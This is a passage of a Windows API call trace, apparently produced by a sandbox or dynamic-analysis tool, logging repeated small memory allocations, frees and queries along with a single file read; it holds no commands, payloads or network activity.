	[0219.139] VirtualAlloc (lpAddress=0x0, dwSize=0x180, flAllocationType=0x3000, flProtect=0x4) returned 0x1dc0000
	[0219.139] VirtualFree (lpAddress=0x1be0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.140] VirtualAlloc (lpAddress=0x0, dwSize=0x25, flAllocationType=0x3000, flProtect=0x4) returned 0x1be0000
	[0219.140] VirtualAlloc (lpAddress=0x0, dwSize=0x12, flAllocationType=0x3000, flProtect=0x4) returned 0x1dd0000
	[0219.140] VirtualAlloc (lpAddress=0x0, dwSize=0x1f, flAllocationType=0x3000, flProtect=0x4) returned 0x1de0000
	[0219.140] VirtualAlloc (lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x4) returned 0x1df0000
	[0219.141] VirtualAlloc (lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x4) returned 0x1f00000
	[0219.141] VirtualAlloc (lpAddress=0x0, dwSize=0x1e, flAllocationType=0x3000, flProtect=0x4) returned 0x1f10000
	[0219.141] VirtualAlloc (lpAddress=0x0, dwSize=0x14, flAllocationType=0x3000, flProtect=0x4) returned 0x1f20000
	[0219.141] VirtualAlloc (lpAddress=0x0, dwSize=0x15, flAllocationType=0x3000, flProtect=0x4) returned 0x1f30000
	[0219.142] VirtualQuery (in: lpAddress=0x1dc0000, lpBuffer=0x1b5d960, dwLength=0x1c | out: lpBuffer=0x1b5d960*(BaseAddress=0x1dc0000, AllocationBase=0x1dc0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0219.142] VirtualQuery (in: lpAddress=0x1dc0000, lpBuffer=0x1b5d95c, dwLength=0x1c | out: lpBuffer=0x1b5d95c*(BaseAddress=0x1dc0000, AllocationBase=0x1dc0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0219.142] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x1f40000
	[0219.142] VirtualFree (lpAddress=0x1dc0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.142] VirtualAlloc (lpAddress=0x0, dwSize=0x30, flAllocationType=0x3000, flProtect=0x4) returned 0x1dc0000
	[0219.143] VirtualAlloc (lpAddress=0x0, dwSize=0x2, flAllocationType=0x3000, flProtect=0x4) returned 0x1f50000
	[0219.143] VirtualAlloc (lpAddress=0x0, dwSize=0x30, flAllocationType=0x3000, flProtect=0x4) returned 0x1f60000
	[0219.143] VirtualFree (lpAddress=0x1f50000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.143] VirtualFree (lpAddress=0x1dc0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.143] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0x1dc0000
	[0219.144] VirtualAlloc (lpAddress=0x0, dwSize=0xe0, flAllocationType=0x3000, flProtect=0x4) returned 0x1f50000
	[0219.144] VirtualAlloc (lpAddress=0x0, dwSize=0x3fc, flAllocationType=0x3000, flProtect=0x4) returned 0x1f70000
	[0219.144] VirtualQuery (in: lpAddress=0x1f70000, lpBuffer=0x1b5d964, dwLength=0x1c | out: lpBuffer=0x1b5d964*(BaseAddress=0x1f70000, AllocationBase=0x1f70000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0219.144] VirtualFree (lpAddress=0x1f70000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.144] VirtualFree (lpAddress=0x1f50000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.145] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x1f50000
	[0219.145] VirtualAlloc (lpAddress=0x0, dwSize=0x50, flAllocationType=0x3000, flProtect=0x4) returned 0x1f70000
	[0219.145] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0x1f80000
	[0219.145] VirtualAlloc (lpAddress=0x0, dwSize=0x80, flAllocationType=0x3000, flProtect=0x4) returned 0x1f90000
	[0219.146] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x4) returned 0x1fa0000
	[0219.146] VirtualAlloc (lpAddress=0x0, dwSize=0x38, flAllocationType=0x3000, flProtect=0x4) returned 0x1fb0000
	[0219.146] VirtualAlloc (lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x4) returned 0x1fc0000
	[0219.147] VirtualAlloc (lpAddress=0x0, dwSize=0x79, flAllocationType=0x3000, flProtect=0x4) returned 0x1fd0000
	[0219.147] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0x1fe0000
	[0219.147] VirtualFree (lpAddress=0x1fb0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.147] VirtualFree (lpAddress=0x1fc0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.147] VirtualFree (lpAddress=0x1fa0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.148] VirtualAlloc (lpAddress=0x0, dwSize=0x15, flAllocationType=0x3000, flProtect=0x4) returned 0x1fa0000
	[0219.148] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0x1fb0000
	[0219.148] VirtualAlloc (lpAddress=0x0, dwSize=0xe0, flAllocationType=0x3000, flProtect=0x4) returned 0x1fc0000
	[0219.148] VirtualAlloc (lpAddress=0x0, dwSize=0x3fc, flAllocationType=0x3000, flProtect=0x4) returned 0x1ff0000
	[0219.149] VirtualQuery (in: lpAddress=0x1ff0000, lpBuffer=0x1b5d964, dwLength=0x1c | out: lpBuffer=0x1b5d964*(BaseAddress=0x1ff0000, AllocationBase=0x1ff0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0219.149] VirtualFree (lpAddress=0x1ff0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.149] VirtualFree (lpAddress=0x1fc0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.149] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x4) returned 0x1fc0000
	[0219.150] VirtualAlloc (lpAddress=0x0, dwSize=0x50, flAllocationType=0x3000, flProtect=0x4) returned 0x1ff0000
	[0219.150] VirtualAlloc (lpAddress=0x0, dwSize=0xd, flAllocationType=0x3000, flProtect=0x4) returned 0x2000000
	[0219.150] VirtualAlloc (lpAddress=0x0, dwSize=0x80, flAllocationType=0x3000, flProtect=0x4) returned 0x2010000
	[0219.151] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2020000
	[0219.151] VirtualAlloc (lpAddress=0x0, dwSize=0x14, flAllocationType=0x3000, flProtect=0x4) returned 0x2030000
	[0219.151] VirtualAlloc (lpAddress=0x0, dwSize=0x15, flAllocationType=0x3000, flProtect=0x4) returned 0x2040000
	[0219.151] VirtualAlloc (lpAddress=0x0, dwSize=0x30, flAllocationType=0x3000, flProtect=0x4) returned 0x2050000
	[0219.152] VirtualAlloc (lpAddress=0x0, dwSize=0x2, flAllocationType=0x3000, flProtect=0x4) returned 0x2060000
	[0219.152] VirtualAlloc (lpAddress=0x0, dwSize=0x30, flAllocationType=0x3000, flProtect=0x4) returned 0x2070000
	[0219.152] VirtualFree (lpAddress=0x2060000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.153] VirtualFree (lpAddress=0x2050000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.153] VirtualAlloc (lpAddress=0x0, dwSize=0x17, flAllocationType=0x3000, flProtect=0x4) returned 0x2050000
	[0219.153] VirtualAlloc (lpAddress=0x0, dwSize=0x30, flAllocationType=0x3000, flProtect=0x4) returned 0x2060000
	[0219.153] VirtualAlloc (lpAddress=0x0, dwSize=0x2, flAllocationType=0x3000, flProtect=0x4) returned 0x2080000
	[0219.154] VirtualAlloc (lpAddress=0x0, dwSize=0x30, flAllocationType=0x3000, flProtect=0x4) returned 0x2090000
	[0219.154] VirtualFree (lpAddress=0x2080000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.154] VirtualFree (lpAddress=0x2060000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.154] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2060000
	[0219.155] VirtualAlloc (lpAddress=0x0, dwSize=0x30, flAllocationType=0x3000, flProtect=0x4) returned 0x2080000
	[0219.155] VirtualAlloc (lpAddress=0x0, dwSize=0x2, flAllocationType=0x3000, flProtect=0x4) returned 0x20a0000
	[0219.155] VirtualAlloc (lpAddress=0x0, dwSize=0x30, flAllocationType=0x3000, flProtect=0x4) returned 0x20b0000
	[0219.156] VirtualFree (lpAddress=0x20a0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.156] VirtualFree (lpAddress=0x2080000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.156] VirtualAlloc (lpAddress=0x0, dwSize=0x35, flAllocationType=0x3000, flProtect=0x4) returned 0x2080000
	[0219.156] VirtualAlloc (lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x4) returned 0x20a0000
	[0219.156] VirtualAlloc (lpAddress=0x0, dwSize=0x36, flAllocationType=0x3000, flProtect=0x4) returned 0x20c0000
	[0219.157] VirtualQuery (in: lpAddress=0x20a0000, lpBuffer=0x1b5d970, dwLength=0x1c | out: lpBuffer=0x1b5d970*(BaseAddress=0x20a0000, AllocationBase=0x20a0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0219.157] VirtualQuery (in: lpAddress=0x20a0000, lpBuffer=0x1b5d96c, dwLength=0x1c | out: lpBuffer=0x1b5d96c*(BaseAddress=0x20a0000, AllocationBase=0x20a0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0219.157] VirtualAlloc (lpAddress=0x0, dwSize=0x38, flAllocationType=0x3000, flProtect=0x4) returned 0x20d0000
	[0219.157] VirtualFree (lpAddress=0x20a0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.157] VirtualAlloc (lpAddress=0x0, dwSize=0x1c, flAllocationType=0x3000, flProtect=0x4) returned 0x20a0000
	[0219.158] VirtualAlloc (lpAddress=0x0, dwSize=0x84, flAllocationType=0x3000, flProtect=0x4) returned 0x20e0000
	[0219.158] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0x20f0000
	[0219.158] VirtualFree (lpAddress=0x2080000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.158] VirtualFree (lpAddress=0x20c0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.159] VirtualFree (lpAddress=0x20d0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.159] VirtualFree (lpAddress=0x20a0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.159] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0x2080000
	[0219.159] VirtualAlloc (lpAddress=0x0, dwSize=0xe0, flAllocationType=0x3000, flProtect=0x4) returned 0x20a0000
	[0219.160] VirtualAlloc (lpAddress=0x0, dwSize=0x3fc, flAllocationType=0x3000, flProtect=0x4) returned 0x20c0000
	[0219.160] VirtualQuery (in: lpAddress=0x20c0000, lpBuffer=0x1b5d964, dwLength=0x1c | out: lpBuffer=0x1b5d964*(BaseAddress=0x20c0000, AllocationBase=0x20c0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0219.160] VirtualFree (lpAddress=0x20c0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.160] VirtualFree (lpAddress=0x20a0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.160] VirtualAlloc (lpAddress=0x0, dwSize=0x35, flAllocationType=0x3000, flProtect=0x4) returned 0x20a0000
	[0219.161] VirtualAlloc (lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x4) returned 0x20c0000
	[0219.161] VirtualAlloc (lpAddress=0x0, dwSize=0x58, flAllocationType=0x3000, flProtect=0x4) returned 0x20d0000
	[0219.161] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x4) returned 0x2100000
	[0219.162] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2110000
	[0219.162] VirtualAlloc (lpAddress=0x0, dwSize=0x66, flAllocationType=0x3000, flProtect=0x4) returned 0x2120000
	[0219.162] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0x2130000
	[0219.163] VirtualFree (lpAddress=0x20a0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.163] VirtualFree (lpAddress=0x20c0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.163] VirtualFree (lpAddress=0x2100000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.163] VirtualFree (lpAddress=0x20d0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.163] VirtualFree (lpAddress=0x2110000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.164] VirtualAlloc (lpAddress=0x0, dwSize=0xe0, flAllocationType=0x3000, flProtect=0x4) returned 0x20a0000
	[0219.164] VirtualAlloc (lpAddress=0x0, dwSize=0x3fc, flAllocationType=0x3000, flProtect=0x4) returned 0x20c0000
	[0219.164] VirtualQuery (in: lpAddress=0x20c0000, lpBuffer=0x1b5d964, dwLength=0x1c | out: lpBuffer=0x1b5d964*(BaseAddress=0x20c0000, AllocationBase=0x20c0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0219.164] VirtualFree (lpAddress=0x20c0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.164] VirtualFree (lpAddress=0x20a0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.165] VirtualAlloc (lpAddress=0x0, dwSize=0x35, flAllocationType=0x3000, flProtect=0x4) returned 0x20a0000
	[0219.166] VirtualAlloc (lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x4) returned 0x20c0000
	[0219.166] VirtualAlloc (lpAddress=0x0, dwSize=0x3c, flAllocationType=0x3000, flProtect=0x4) returned 0x20d0000
	[0219.166] VirtualQuery (in: lpAddress=0x20c0000, lpBuffer=0x1b5d970, dwLength=0x1c | out: lpBuffer=0x1b5d970*(BaseAddress=0x20c0000, AllocationBase=0x20c0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0219.166] VirtualQuery (in: lpAddress=0x20c0000, lpBuffer=0x1b5d96c, dwLength=0x1c | out: lpBuffer=0x1b5d96c*(BaseAddress=0x20c0000, AllocationBase=0x20c0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0219.166] VirtualAlloc (lpAddress=0x0, dwSize=0x38, flAllocationType=0x3000, flProtect=0x4) returned 0x2100000
	[0219.167] VirtualFree (lpAddress=0x20c0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.167] VirtualAlloc (lpAddress=0x0, dwSize=0x58, flAllocationType=0x3000, flProtect=0x4) returned 0x20c0000
	[0219.167] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x4) returned 0x2110000
	[0219.167] VirtualAlloc (lpAddress=0x0, dwSize=0x1a, flAllocationType=0x3000, flProtect=0x4) returned 0x2140000
	[0219.168] VirtualAlloc (lpAddress=0x0, dwSize=0x82, flAllocationType=0x3000, flProtect=0x4) returned 0x2150000
	[0219.168] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0x2160000
	[0219.168] VirtualFree (lpAddress=0x20a0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.168] VirtualFree (lpAddress=0x20d0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.169] VirtualFree (lpAddress=0x2100000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.169] VirtualFree (lpAddress=0x2110000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.169] VirtualFree (lpAddress=0x20c0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.169] VirtualFree (lpAddress=0x2140000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.169] VirtualAlloc (lpAddress=0x0, dwSize=0xe0, flAllocationType=0x3000, flProtect=0x4) returned 0x20a0000
	[0219.170] VirtualAlloc (lpAddress=0x0, dwSize=0x3fc, flAllocationType=0x3000, flProtect=0x4) returned 0x20c0000
	[0219.170] VirtualQuery (in: lpAddress=0x20c0000, lpBuffer=0x1b5d964, dwLength=0x1c | out: lpBuffer=0x1b5d964*(BaseAddress=0x20c0000, AllocationBase=0x20c0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0219.170] VirtualFree (lpAddress=0x20c0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.170] VirtualFree (lpAddress=0x20a0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.171] ReadFile (in: hFile=0x114, lpBuffer=0x17492a0, nNumberOfBytesToRead=0x800, lpNumberOfBytesRead=0x1b5e040, lpOverlapped=0x1b5e004 | out: lpBuffer=0x17492a0*, lpNumberOfBytesRead=0x1b5e040*=0x800, lpOverlapped=0x1b5e004) returned 1
	[0219.171] VirtualAlloc (lpAddress=0x0, dwSize=0xd, flAllocationType=0x3000, flProtect=0x4) returned 0x20a0000
	[0219.171] VirtualAlloc (lpAddress=0x0, dwSize=0x50, flAllocationType=0x3000, flProtect=0x4) returned 0x20c0000
	[0219.171] VirtualAlloc (lpAddress=0x0, dwSize=0xd, flAllocationType=0x3000, flProtect=0x4) returned 0x20d0000
	[0219.172] VirtualAlloc (lpAddress=0x0, dwSize=0x80, flAllocationType=0x3000, flProtect=0x4) returned 0x2100000
	[0219.172] VirtualAlloc (lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x4) returned 0x2110000
	[0219.172] VirtualAlloc (lpAddress=0x0, dwSize=0x35, flAllocationType=0x3000, flProtect=0x4) returned 0x2140000
	[0219.172] VirtualAlloc (lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x4) returned 0x2170000
	[0219.173] VirtualAlloc (lpAddress=0x0, dwSize=0x78, flAllocationType=0x3000, flProtect=0x4) returned 0x2180000
	[0219.173] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0x2190000
	[0219.173] VirtualFree (lpAddress=0x2140000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.174] VirtualFree (lpAddress=0x2170000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.174] VirtualFree (lpAddress=0x2110000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.174] VirtualAlloc (lpAddress=0x0, dwSize=0x15, flAllocationType=0x3000, flProtect=0x4) returned 0x2110000
	[0219.174] VirtualAlloc (lpAddress=0x0, dwSize=0x19, flAllocationType=0x3000, flProtect=0x4) returned 0x2140000
	[0219.175] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0x2170000
	[0219.175] VirtualAlloc (lpAddress=0x0, dwSize=0x1b, flAllocationType=0x3000, flProtect=0x4) returned 0x21a0000
	[0219.175] VirtualAlloc (lpAddress=0x0, dwSize=0x16, flAllocationType=0x3000, flProtect=0x4) returned 0x21b0000
	[0219.175] VirtualAlloc (lpAddress=0x0, dwSize=0x30, flAllocationType=0x3000, flProtect=0x4) returned 0x21c0000
	[0219.176] VirtualAlloc (lpAddress=0x0, dwSize=0x2, flAllocationType=0x3000, flProtect=0x4) returned 0x21d0000
	[0219.176] VirtualAlloc (lpAddress=0x0, dwSize=0x30, flAllocationType=0x3000, flProtect=0x4) returned 0x21e0000
	[0219.176] VirtualFree (lpAddress=0x21d0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.177] VirtualFree (lpAddress=0x21c0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.177] VirtualAlloc (lpAddress=0x0, dwSize=0xf, flAllocationType=0x3000, flProtect=0x4) returned 0x21c0000
	[0219.177] VirtualAlloc (lpAddress=0x0, dwSize=0x33, flAllocationType=0x3000, flProtect=0x4) returned 0x21d0000
	[0219.177] VirtualAlloc (lpAddress=0x0, dwSize=0x3, flAllocationType=0x3000, flProtect=0x4) returned 0x21f0000
	[0219.178] VirtualAlloc (lpAddress=0x0, dwSize=0x30, flAllocationType=0x3000, flProtect=0x4) returned 0x2200000
	[0219.178] VirtualFree (lpAddress=0x21f0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.178] VirtualFree (lpAddress=0x21d0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.179] VirtualAlloc (lpAddress=0x0, dwSize=0x12, flAllocationType=0x3000, flProtect=0x4) returned 0x21d0000
	[0219.179] VirtualAlloc (lpAddress=0x0, dwSize=0x30, flAllocationType=0x3000, flProtect=0x4) returned 0x21f0000
	[0219.179] VirtualAlloc (lpAddress=0x0, dwSize=0x2, flAllocationType=0x3000, flProtect=0x4) returned 0x2210000
	[0219.179] VirtualAlloc (lpAddress=0x0, dwSize=0x30, flAllocationType=0x3000, flProtect=0x4) returned 0x2220000
	[0219.180] VirtualFree (lpAddress=0x2210000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.180] VirtualFree (lpAddress=0x21f0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.180] VirtualAlloc (lpAddress=0x0, dwSize=0x11, flAllocationType=0x3000, flProtect=0x4) returned 0x21f0000
	[0219.181] VirtualQuery (in: lpAddress=0x2100000, lpBuffer=0x1b5d960, dwLength=0x1c | out: lpBuffer=0x1b5d960*(BaseAddress=0x2100000, AllocationBase=0x2100000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0219.181] VirtualQuery (in: lpAddress=0x2100000, lpBuffer=0x1b5d95c, dwLength=0x1c | out: lpBuffer=0x1b5d95c*(BaseAddress=0x2100000, AllocationBase=0x2100000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0219.181] VirtualAlloc (lpAddress=0x0, dwSize=0x100, flAllocationType=0x3000, flProtect=0x4) returned 0x2210000
	[0219.181] VirtualFree (lpAddress=0x2100000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.181] VirtualAlloc (lpAddress=0x0, dwSize=0x30, flAllocationType=0x3000, flProtect=0x4) returned 0x2100000
	[0219.181] VirtualAlloc (lpAddress=0x0, dwSize=0x2, flAllocationType=0x3000, flProtect=0x4) returned 0x2230000
	[0219.182] VirtualAlloc (lpAddress=0x0, dwSize=0x30, flAllocationType=0x3000, flProtect=0x4) returned 0x2240000
	[0219.182] VirtualFree (lpAddress=0x2230000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.182] VirtualFree (lpAddress=0x2100000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.183] VirtualAlloc (lpAddress=0x0, dwSize=0x1b, flAllocationType=0x3000, flProtect=0x4) returned 0x2100000
	[0219.183] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0x2230000
	[0219.183] VirtualAlloc (lpAddress=0x0, dwSize=0xe0, flAllocationType=0x3000, flProtect=0x4) returned 0x2250000
	[0219.183] VirtualAlloc (lpAddress=0x0, dwSize=0x3fc, flAllocationType=0x3000, flProtect=0x4) returned 0x2260000
	[0219.184] VirtualQuery (in: lpAddress=0x2260000, lpBuffer=0x1b5d964, dwLength=0x1c | out: lpBuffer=0x1b5d964*(BaseAddress=0x2260000, AllocationBase=0x2260000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0219.184] VirtualFree (lpAddress=0x2260000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.184] VirtualFree (lpAddress=0x2250000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.184] VirtualAlloc (lpAddress=0x0, dwSize=0x12, flAllocationType=0x3000, flProtect=0x4) returned 0x2250000
	[0219.185] VirtualAlloc (lpAddress=0x0, dwSize=0x50, flAllocationType=0x3000, flProtect=0x4) returned 0x2260000
	[0219.185] VirtualAlloc (lpAddress=0x0, dwSize=0xd, flAllocationType=0x3000, flProtect=0x4) returned 0x2270000
	[0219.185] VirtualAlloc (lpAddress=0x0, dwSize=0x80, flAllocationType=0x3000, flProtect=0x4) returned 0x2280000
	[0219.185] VirtualAlloc (lpAddress=0x0, dwSize=0x25, flAllocationType=0x3000, flProtect=0x4) returned 0x2290000
	[0219.186] VirtualAlloc (lpAddress=0x0, dwSize=0x35, flAllocationType=0x3000, flProtect=0x4) returned 0x22a0000
	[0219.186] VirtualAlloc (lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x4) returned 0x22b0000
	[0219.186] VirtualAlloc (lpAddress=0x0, dwSize=0x7d, flAllocationType=0x3000, flProtect=0x4) returned 0x22c0000
	[0219.187] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0x22d0000
	[0219.187] VirtualFree (lpAddress=0x22a0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.187] VirtualFree (lpAddress=0x22b0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.188] VirtualFree (lpAddress=0x2290000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.188] VirtualAlloc (lpAddress=0x0, dwSize=0x15, flAllocationType=0x3000, flProtect=0x4) returned 0x2290000
	[0219.188] VirtualAlloc (lpAddress=0x0, dwSize=0x17, flAllocationType=0x3000, flProtect=0x4) returned 0x22a0000
	[0219.189] VirtualAlloc (lpAddress=0x0, dwSize=0x1b, flAllocationType=0x3000, flProtect=0x4) returned 0x22b0000
	[0219.189] VirtualAlloc (lpAddress=0x0, dwSize=0xd, flAllocationType=0x3000, flProtect=0x4) returned 0x22e0000
	[0219.189] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x22f0000
	[0219.189] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0x2300000
	[0219.190] VirtualAlloc (lpAddress=0x0, dwSize=0x15, flAllocationType=0x3000, flProtect=0x4) returned 0x2310000
	[0219.190] VirtualAlloc (lpAddress=0x0, dwSize=0x15, flAllocationType=0x3000, flProtect=0x4) returned 0x2320000
	[0219.190] VirtualQuery (in: lpAddress=0x2280000, lpBuffer=0x1b5d960, dwLength=0x1c | out: lpBuffer=0x1b5d960*(BaseAddress=0x2280000, AllocationBase=0x2280000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0219.190] VirtualQuery (in: lpAddress=0x2280000, lpBuffer=0x1b5d95c, dwLength=0x1c | out: lpBuffer=0x1b5d95c*(BaseAddress=0x2280000, AllocationBase=0x2280000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0219.190] VirtualAlloc (lpAddress=0x0, dwSize=0x100, flAllocationType=0x3000, flProtect=0x4) returned 0x2330000
	[0219.191] VirtualFree (lpAddress=0x2280000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.191] VirtualAlloc (lpAddress=0x0, dwSize=0x16, flAllocationType=0x3000, flProtect=0x4) returned 0x2280000
	[0219.191] VirtualAlloc (lpAddress=0x0, dwSize=0x30, flAllocationType=0x3000, flProtect=0x4) returned 0x2340000
	[0219.192] VirtualAlloc (lpAddress=0x0, dwSize=0x2, flAllocationType=0x3000, flProtect=0x4) returned 0x2350000
	[0219.192] VirtualAlloc (lpAddress=0x0, dwSize=0x30, flAllocationType=0x3000, flProtect=0x4) returned 0x2360000
	[0219.192] VirtualFree (lpAddress=0x2350000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.193] VirtualFree (lpAddress=0x2340000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.193] VirtualAlloc (lpAddress=0x0, dwSize=0xf, flAllocationType=0x3000, flProtect=0x4) returned 0x2340000
	[0219.193] VirtualAlloc (lpAddress=0x0, dwSize=0x33, flAllocationType=0x3000, flProtect=0x4) returned 0x2350000
	[0219.193] VirtualAlloc (lpAddress=0x0, dwSize=0x3, flAllocationType=0x3000, flProtect=0x4) returned 0x2370000
	[0219.194] VirtualAlloc (lpAddress=0x0, dwSize=0x30, flAllocationType=0x3000, flProtect=0x4) returned 0x2380000
	[0219.194] VirtualFree (lpAddress=0x2370000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.194] VirtualFree (lpAddress=0x2350000, dwSize=0x0, dwFreeType=0x8000) returned 1
